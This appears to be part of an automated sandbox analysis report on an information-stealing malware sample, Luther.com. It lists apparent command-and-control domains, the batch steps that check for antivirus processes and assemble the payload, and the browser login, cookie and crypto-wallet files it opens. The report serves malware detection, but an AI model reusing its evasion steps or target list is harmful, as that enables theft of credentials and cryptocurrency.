                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: washyceehsu.lat
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bloodyswif.lat
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: goldyhanders.cyou
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E91B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00E91B4D
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E3338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00E3338B
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9BBED SendInput,keybd_event,13_2_00E9BBED
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9ECD0 mouse_event,13_2_00E9ECD0
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224553Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ChoosingJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Readily" Departure Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.comJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many zJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224553\Luther.com Luther.com zJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E914AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00E914AE
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E91FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,13_2_00E91FB0
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmp, Luther.com.2.dr, Page.9.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Luther.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E50A08 cpuid 13_2_00E50A08
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E8E5F4 GetLocalTime,13_2_00E8E5F4
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E8E652 GetUserNameW,13_2_00E8E652
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E6BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,13_2_00E6BCD2
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Luther.com, 0000000D.00000002.4497541378.00000000038BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: Luther.com PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 71520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"%3
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 71520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"%3
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Luther.com, 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,*3
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
